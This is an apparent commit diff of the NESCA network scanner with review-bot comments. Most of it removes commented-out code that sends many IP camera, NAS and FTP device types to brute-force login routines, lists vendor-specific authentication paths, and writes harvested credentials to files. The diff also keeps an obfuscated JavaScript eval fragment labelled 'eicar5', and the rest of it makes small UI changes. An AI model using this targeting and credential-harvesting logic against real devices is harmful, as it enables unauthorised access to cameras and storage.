sz : 256)); - //}; - - //if (strstr(finalstr, ps.headr) == NULL) strcat(finalstr, ps.headr); - //if (flag == -1) return -1; - - //if (flag == 4 && HikVis::isInitialized) - //{ - // HikVis hv; - // lopaStr lps = hv.HVLobby(ip, port); - // if (strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0) - // { - // _specFillerBA(ip, port, "[Hikvision] iVMS client required.", lps.login, lps.pass, 0); - // fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[Hikvision] iVMS client required ().", - // lps.login, lps.pass, "[Hikvision] iVMS", "UTF-8", "Basic Authorization"); - - // while (hikkaStop) Sleep(10); - // hikkaStop = true; - // char fileName[256] = { 0 }; - // char date[64] = { 0 }; - // strcpy(date, Utils::getStartDate().c_str()); - // sprintf(fileName, "./result_files-%s/hikkafile_%s.csv", date, date); - // FILE *f = fopen(fileName, "a"); - // if (f != NULL) { - // char string[1024] = { 0 }; - // sprintf(string, "\"%s\",\"0\",%s,\"%d\",\"2\",\"%s\",\"%s\",\"0\",\"1\",\"0\",\"0\"\n", - // ip, ip, port, lps.login, lps.pass); - // fputs(string, f); - // fclose(f); - // } - // else stt->doEmitionRedFoundData("Cannot open csv - \"" + QString(fileName)); - // hikkaStop = false; - // }; - // return -1; - //} - //else if (flag == 5) - //{ - // HikVis hv; - // lopaStr lps = hv.RVILobby(ip, port); - // if (strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0) - // { - // _specFillerBA(ip, port, "[RVI] RVI VSS client required.", lps.login, lps.pass, 0); - // fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[RVI] RVI VSS client required ().", - // lps.login, lps.pass, "[RVI] RVI", "UTF-8", "Basic Authorization"); - - // while (rviStop) Sleep(10); - // rviStop = true; - // char fileName[256] = { 0 }; - // char date[64] = { 0 }; - // strcpy(date, Utils::getStartDate().c_str()); - // sprintf(fileName, "./result_files-%s/rvifile_%s.csv", date, date); - // FILE *f = fopen(fileName, "a"); - // if (f != NULL) { - // char string[1024] = { 0 }; - // 
sprintf(string, "\"%s\",\"0\",%s,\"%d\",\"2\",\"%s\",\"%s\",\"0\",\"1\",\"0\",\"0\"\n", - // ip, ip, port, lps.login, lps.pass); - // fputs(string, f); - // fclose(f); - // } - // else stt->doEmitionRedFoundData("Cannot open csv - \"" + QString(fileName)); - // rviStop = false; - // }; - // return -1; - //} - //else if (flag == 16) - //{ - // char log[2048] = { 0 }; - // char logEmit[2048] = { 0 }; - - // const lopaStr &lps = FTPA::FTPLobby(ip, port, &ps); - - // if (strstr(lps.other, "ROUTER") != NULL) - // { - // ++PieBA; - - // sprintf(log, "[FTP]:%s:%d; Received: %dftp://%s:%s@%s [ROUTER]%s", - // ip, port, size, lps.login, lps.pass, ip, lps.login, lps.pass, ip, ip, ps.headr); - // sprintf(logEmit, "[FTP]:ftp://%s:%s@%s [ROUTER]", - // lps.login, lps.pass, ip, lps.login, lps.pass, ip, ip); - - // fputsf(log, flag, "FTP"); - - // fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[FTP service]", lps.login, lps.pass, "Router FTP detected.", cp, "FTP"); - - // stt->doEmitionFoundData(QString::fromLocal8Bit(logEmit)); - // } - // else if (strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0) - // { - // ++PieBA; - - // sprintf(log, "[FTP]:%s:%d; Received: %dftp://%s:%s@%s%s (F:%d)", - // ip, port, size, lps.login, lps.pass, ip, lps.login, lps.pass, ip, ps.headr, ps.directoryCount); - // sprintf(logEmit, "[FTP]:ftp://%s:%s@%s (F:%d)", - // lps.login, lps.pass, ip, lps.login, lps.pass, ip, ps.directoryCount); - - // fputsf(log, flag, "FTP"); - - // fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[FTP service]", lps.login, lps.pass, "NULL", cp, "FTP"); - - // stt->doEmitionFoundData(QString::fromLocal8Bit(logEmit)); - - // } - // else if (strstr(lps.login, "Unknown protocol") != NULL) - // { - // strcat(log, "; [!] USER/PASS commands failed. 
Dunno what to do."); - // fputsf(log, flag, ""); - - // stt->doEmitionFoundData(QString::fromLocal8Bit(log)); - // }; - //} - //else if (flag == 21) //Eyeon - //{ - // _specBrute(ip, port, "Eyeon Camera", flag, "/user/index.htm", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 22) //IP Camera control - //{ - // _specBrute(ip, port, "IP camera Control webpage", flag, "/main/cs_motion.asp", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 23) //Network Camera BB-SC384 - //{ - // _specBrute(ip, port, "Network Camera BB-SC384", flag, "/live/index2.html", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 24) //Network Camera VB-M40 - //{ - // _specBrute(ip, port, "Network Camera VB-M40", flag, "/-wvhttp-01-/open.cgi?", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 25) //Panasonic Unibrowser-camera - //{ - // _specBrute(ip, 60002, "Panasonic Unibrowser-camera", flag, "/SnapshotJPEG", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 26) //Sony Network Camera - //{ - // _specBrute(ip, port, "Sony Network Camera", flag, "/oneshotimage?", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 27) //UA Network Camera - //{ - // _specBrute(ip, port, "UA Network Camera", flag, "/webs.cgi?", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 28) //Network Camera VB-M40 - //{ - // _specBrute(ip, port, "Network Camera VB-??", flag, "/-wvhttp-01-/open.cgi?", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 29) //LG Smart IP Device - //{ - // _specBrute(ip, port, "LG Smart IP Device Camera", flag, "/digest.php", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 30) //NAS - //{ - // _specBrute(ip, port, "NAS", flag, "/cgi-bin/data/viostor-220/viostor/viostor.cgi", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 31) //ip cam - //{ - // _specBrute(ip, port, "IP Camera", flag, 
"/check_user.cgi", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 32) //IPC WEB ip cam - //{ - // _specWEBIPCAMBrute(ip, port, "[IPC] WEB IP Camera", flag, "WEB Authorization", cp, size, "IPC"); - //} - //else if (flag == 33) //GEOvision ip cam - //{ - // _specWEBIPCAMBrute(ip, port, "[GEO] WEB IP Camera", flag, "WEB Authorization", cp, size, "GEO"); - //} - //else if (flag == 34) //Hikvision ip cam - //{ - // if (_specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/SelfExt/userCheck", "[DIGEST]", cp, size, buffcpy) == -1){ - // _specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/HIK/userCheck", "[DIGEST]", cp, size, buffcpy); - // } - //} - //else if (flag == 35) //EasyCam - //{ - // _specWEBIPCAMBrute(ip, port, "[EasyCam] WEB IP Camera", flag, "WEB Authorization", cp, size, "EasyCam"); - //} - //else if (flag == 36) //Panasonic Cam - //{ - // _specBrute(ip, port, QString("[Panasonic] IP Camera (" + QString(ip) + ":" + QString::number(port) + ")").toLocal8Bit().data(), flag, - // "/config/index.cgi", "Basic Authorization", cp, size, buffcpy); - - // stt->doEmitionYellowFoundData("[PaCr]Panasonic cam detected, crawling started."); - - // std::string buff; - // Connector con; - // con.nConnect(std::string(std::string(ip) + "/config/cam_portal.cgi").c_str(), port, &buff); - // int nPort = port; - // for (int i = 0; i < 16; ++i) { - // std::string &cam_link_data = Utils::getStrValue(buff, "cam_link[" + std::to_string(i) + "]", ";"); - // if (cam_link_data.size() != 0) { - // std::string &newURL = Utils::getStrValue(cam_link_data, "src=\"", "\""); - // if (newURL.size() != 0) { - // std::string &newIP = Utils::getStrValue(newURL, "http://", "/"); - // if (newIP.size() != 0) { - // std::string &newPath = newURL.substr(newURL.find(newIP) + newIP.length()); - // std::vector portVec = Utils::splitToStrVector(newIP, ':'); - // stt->doEmitionYellowFoundData("[PaCr] Url found:" + QString(newURL.c_str())); - - // portVec.size() 
== 2 ? nPort = std::stoi(portVec[1]) : NULL; - - // _specBrute(newIP.c_str(), nPort, QString("[Panasonic] IP Camera (" + - // QString(newIP.c_str()) + ":" + QString::number(nPort) + ")").toLocal8Bit().data(), flag, - // (char*)newPath.c_str(), "Basic Authorization", cp, size, buffcpy); - // } - // } - // else stt->doEmitionRedFoundData("[Panasonic Cam URL] Cannot extract data " + - // QString(ip) + ":" + QString::number(port)); - // } - // else stt->doEmitionRedFoundData("[Panasonic Cam cam_link] Cannot extract data " + - // QString(ip) + ":" + QString::number(port)); - // } - //} - //else if (flag == 37) //Panasonic Cam - //{ - // _specBrute(ip, port, "[Panasonic] IP Camera", flag, "/view/getuid.cgi", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 38) //Foscam - //{ - // _specWEBIPCAMBrute(ip, port, "[Foscam] IP Camera", flag, "Web Authorization", cp, size, "Foscam"); - //} - //else if (flag == 39) //EagleEye - //{ - // _specBrute(ip, port, "[EagleEye] IP Camera", flag, "/cgi-bin/guest/Video.cgi?", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 40) //Network Camera VB-C?? - //{ - // _specBrute(ip, port, "[Network Camera VB-C??] 
IP Camera", flag, "/admin/index.shtml?", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 41) //AVIOSYS-camera - //{ - // _specWEBIPCAMBrute(ip, port, "[AVIOSYS] IP Camera", flag, "Web Authorization", cp, size, "AVIOSYS"); - //} - //else if (flag == 42) //NW_camera - //{ - // _specBrute(ip, port, "[NW_camera] IP Camera", flag, "/cgi-bin/getuid?FILE=indexnw.html", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 43) //NW_camera - //{ - // _specBrute(ip, port, "[Micros] IP Camera", flag, "/gui/rem_display.shtml", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 44) //Hikvision ip cam 2 - //{ - // _specBrute(ip, port, "[Hikvision] IP Camera 2", flag, "/ISAPI/Security/userCheck", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 45) //Panasonic ip cam - //{ - // _specBrute(ip, port, "[Panasonic] IP Camera", flag, "/config/index.cgi", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 46) //Buffalo disk - //{ - // _specWEBIPCAMBrute(ip, port, "[Buffalo] Lan Disk", flag, "Web Authorization", cp, size, "BUFFALO"); - //} - //else if (flag == 47) //Digital Video Server - //{ - // _specWEBIPCAMBrute(ip, port, "[DVS] Camera", flag, "Web Authorization", cp, size, "DVS"); - //} - //else if (flag == 48) //ipCAM - //{ - // _specWEBIPCAMBrute(ip, port, "[ipCAM] Camera", flag, "Web Authorization", cp, size, "IPCAM"); - //} - //else if (flag == 49) //IEORFOREFOX - //{ - // _specWEBIPCAMBrute(ip, port, "[IEORFOREFOX] Camera", flag, "Web Authorization", cp, size, "IEORFOREFOX"); - //} - //else if (flag == 50) //IP Camera - //{ - // _specBrute(ip, port, "IP Camera", flag, "/app/multi/single.asp", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 51) //MASPRO - //{ - // _specWEBIPCAMBrute(ip, port, "[MASPRO] WEB IP Camera", flag, "WEB Authorization", cp, size, "MASPRO"); - //} - //else if (flag == 52) //webcamxp5 - //{ - // _specWEBIPCAMBrute(ip, port, "[WEBCAMXP] 
WEB IP Camera", flag, "WEB Authorization", cp, size, "WEBCAMXP"); - //} - //else if (flag == 53) //Jassun - //{ - // _specWEBIPCAMBrute(ip, port, "[JASSUN] WEB IP Camera", flag, "WEB Authorization", cp, size, "JASSUN"); - //} - //else if (flag == 54) //Beward - //{ - // _specWEBIPCAMBrute(ip, port, "[BEWARD] WEB IP Camera", flag, "WEB Authorization", cp, size, "BEWARD"); - //} - //else if (flag == 55) //QCam - //{ - // _specBrute(ip, port, "IP Camera", flag, "/videostream.cgi", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 20) //AXIS Camera - //{ - // if (_specBrute(ip, port, "AXIS Camera", flag, "/mjpg/video.mjpg", "Basic Authorization", cp, size, buffcpy) == -1) { - // if (_specBrute(ip, port, "AXIS Camera", flag, "/axis-cgi/com/ptz.cgi?", "Basic Authorization", cp, size, buffcpy) == -1) { - // _specBrute(ip, port, "AXIS Camera", flag, "/view/viewer_index.shtml?", "Basic Authorization", cp, size, buffcpy); - // } - // } - //} - //else if (flag == 19) //reecam cameras - //{ - // _specBrute(ip, port, "Reecam (network camera)", flag, "/videostream.cgi", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 18) //linksys camera - //{ - // _specBrute(ip, port, "Linksys camera", flag, "/img/main.cgi", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 17) //Real-time IP Camera Monitoring System - //{ - // _specBrute(ip, port, "Real-time IP Camera Monitoring System", flag, "/live.htm", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 11) - //{ - // _specBrute(ip, port, "Netwave IP Camera", flag, "/videostream.cgi", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 12) - //{ - // _specBrute(ip, port, "IP Camera", flag, "/view/view.shtml?videos=", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 13) - //{ - // _specBrute(ip, port, "IP Camera", flag, "/eng/view/indexjava.html", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 14) - 
//{ - // _specBrute(ip, port, "IP Camera", flag, "/rdr.cgi", "Basic Authorization", cp, size, buffcpy); - //} - //else if (flag == 15) //For HFS - //{ - // char log[512] = { 0 }; - // ++camerasC1; - - // const lopaStr &lps = BA::BALobby((string(ip) + "/~login").c_str(), port, false); - // sprintf(log, "[HFS]:%s:%d T: %s Pass: %s:%s", - // ip, port, ip, port, finalstr, lps.login, lps.pass); - - // fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, "HFS-FTP", cp, "Basic Authorization"); - // fputsf(log, flag, "HFS"); - // stt->doEmitionFoundData(QString::fromLocal8Bit(log)); - //} - //else if (flag == 1) - //{ - // _specBrute(ip, port, finalstr, flag, baPath, "[NORMAL]", cp, size, buffcpy); - //} - //else if (flag == 101) - //{ - // _specBrute(ip, port, finalstr, flag, baPath, "[DIGEST]", cp, size, buffcpy); - //} - ////else if (flag == 10) - ////{ - //// _specWFBrute(ip, port, buffcpy->c_str(), flag, baPath, "Web Form", "Web Form", cp, size, finalstr); - ////} - //else if (flag == 2) - //{ - // putInFile(0, ip, port, size, "[OVERFLOW]", cp); - //} - //else - //{ - // putInFile(flag, ip, port, size, finalstr, cp); - //}; - - //return flag; } diff --git a/mainResources.h b/mainResources.h index a12edc5..eada05d 100644 --- a/mainResources.h +++ b/mainResources.h @@ -186,7 +186,7 @@ public: PathStr *ps, std::vector *lst, int size);*/ - int filler(char* ip, + int filler(char* ip, char *ipRaw, int port, std::string *buffcpy, int size, diff --git a/nesca_3.cpp b/nesca_3.cpp index 10399ce..df93279 100644 --- a/nesca_3.cpp +++ b/nesca_3.cpp @@ -1407,6 +1407,12 @@ void nesca_3::switchToJobMode() }; } +#include +void copyToClipboardLocation() { + ui->currentDirectoryLine->selectAll(); + QClipboard *c = QApplication::clipboard(); + c->setText(ui->currentDirectoryLine->text()); +} bool nesca_3::eventFilter(QObject* obj, QEvent *event) { if (obj == qwm) 
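Review bot: The redirect handling added at the end of `handleFramesets` feeds text from the server's `Location:` header straight into `std::stoi` (`newPort = std::stoi(location.substr(portPos + 1));`, in both the `http://` and `https://` branches), and `std::stoi` throws `std::invalid_argument` or `std::out_of_range` when that text does not start with a number that fits in an int. Nothing visible in the hunk catches it, so one malformed header would propagate an exception out of the caller. Guard the call, e.g. `try { newPort = std::stoi(location.substr(portPos + 1)); } catch (const std::exception &) { }`, which keeps the default already assigned, and reject values outside 1–65535. In the re-indented `Lexems::filler`, `strncpy(cp, getCodePage(buffcpy->c_str()), 32);` leaves `cp` unterminated when the code-page string is 32 characters or longer; copy at most `sizeof(cp) - 1`. `handleFramesets` starts before this hunk, so its earlier parsing is not covered here.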
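Review bot: The `#include` added in the middle of nesca_3.cpp, directly above `copyToClipboardLocation()`, belongs with the other includes at the top of the file. A mid-file include hides the dependency and makes its effect depend on what was declared before it. `copyToClipboardLocation()` is also a file-local helper with external linkage; declare it `static` or put it in an anonymous namespace so it cannot clash with a symbol in another translation unit.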
@@ -1428,6 +1434,10 @@ bool nesca_3::eventFilter(QObject* obj, QEvent *event) else if (event->type() == QEvent::KeyRelease) return true; return false; } + else if (obj == ui->currentDirectoryLine && event->type() == QEvent::MouseButtonPress) + { + copyToClipboardLocation(); + } else { if (event->type() == QEvent::KeyPress) @@ -2304,6 +2314,7 @@ void nesca_3::ConnectEvrthng() connect ( stt, SIGNAL(changeYellowFoundData(QString)), this, SLOT(appendNotifyText(QString))); connect ( stt, SIGNAL(changeRedFoundData(QString)), this, SLOT(appendErrText(QString))); connect ( stt, SIGNAL(changeGreenFoundData(QString)), this, SLOT(appendOKText(QString))); + connect(stt, SIGNAL(foundDataCustom(QString, QString)), this, SLOT(appendTextCustom(QString, QString))); connect ( stt, SIGNAL(killSttThread()), this, SLOT(STTTerminate())); connect ( stt, SIGNAL(signalUpdateArc(unsigned long)), this, SLOT(drawVerboseArcs(unsigned long))); @@ -3072,6 +3083,10 @@ void nesca_3::appendOKText(QString str) { ui->dataText->append("[" + QTime::currentTime().toString() + "][OK] " + str + ""); } +void nesca_3::appendTextCustom(QString str, QString color) +{ + ui->dataText->append("[" + QTime::currentTime().toString() + "][OK] " + str + ""); +} void nesca_3::appendNotifyText(QString str) { @@ -3289,6 +3304,7 @@ void nesca_3::finishLoading() { //#define eicar4 "" //#define eicar5 "\"split\";e=eval;v=\"0x\";a=0;z=\"y\";try{a*=25}catch(zz){a=1}if(!a){try{--e(\"doc\"+\"ument\")[\"\x62od\"+z]}catch(q){}" + nesca_3::nesca_3(bool isWM, QWidget *parent = 0) : QMainWindow(parent) { /*if (isWM) { @@ -3326,6 +3342,8 @@ nesca_3::nesca_3(bool isWM, QWidget *parent = 0) : QMainWindow(parent) tray = new QSystemTrayIcon(QIcon(":/nesca_3/nesca.ico"), this); tray->hide(); + + ui->currentDirectoryLine->installEventFilter(this); SetValidators(); ConnectEvrthng(); diff --git a/nesca_3.h b/nesca_3.h index 55cdef0..11c212b 100644 --- a/nesca_3.h +++ b/nesca_3.h 
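Review bot: The new `else if (obj == ui->currentDirectoryLine && event->type() == QEvent::MouseButtonPress)` branch in `nesca_3::eventFilter` has no `return`, unlike the branch above it, which ends in `return false;`. Whether control then reaches a return statement depends on code after the hunk, which is not visible here; if it does not, flowing off the end of a `bool` function is undefined behaviour. Add `return false;` after `copyToClipboardLocation();` so the result is explicit and the click is still delivered to the line edit.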
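Review bot: `nesca_3::appendTextCustom` concatenates `str` into the text passed to `ui->dataText->append(...)` without escaping, and `append()` on a QTextEdit-style widget interprets markup. If any emitter of `foundDataCustom` passes text derived from a remote response, that text can inject markup into the log view. Escape it first, e.g. `str.toHtmlEscaped()` on Qt 5 or `Qt::escape(str)` on Qt 4, and apply the same to `color` if it is interpolated into a tag (the markup in this line appears to have been lost on this page). The hard-coded `[OK]` label looks copied from `appendOKText` and is probably not intended for a custom-coloured message. Both parameters could be `const QString &`.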
@@ -47,7 +47,7 @@ public: // void ChangeLabelIPS_Value(QString str); // void newListItem(QString str); static int addBARow(QString ip, QString loginPass, QString percentage); - + bool nesca_3::etEventFilter(QObject* object, QEvent* event); public: static int perc; static int savedTabIndex; @@ -116,6 +116,7 @@ protected: void ChangeLabelTO_ValueChanged(QString); void appendErrText(QString str); void appendOKText(QString str); + void appendTextCustom(QString str, QString color); void appendDebugText(QString str); void appendNotifyText(QString str); void appendDefaultText(QString str); diff --git a/version b/version index f5021a8..38c577f 100644 --- a/version +++ b/version @@ -1 +1 @@ -2716B-167 \ No newline at end of file +27183-904 \ No newline at end of file
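Review bot: The declaration `bool nesca_3::etEventFilter(QObject* object, QEvent* event);` added inside the class looks like a misspelling of `eventFilter`. nesca_3.cpp in this same commit extends `nesca_3::eventFilter`, and no `etEventFilter` definition is visible anywhere on the page. The `nesca_3::` qualifier on a member declaration inside its own class is also ill-formed in standard C++, although some compilers accept it as an extension. If `eventFilter` is already declared elsewhere in the header, drop this line; otherwise declare it as `bool eventFilter(QObject *object, QEvent *event);`.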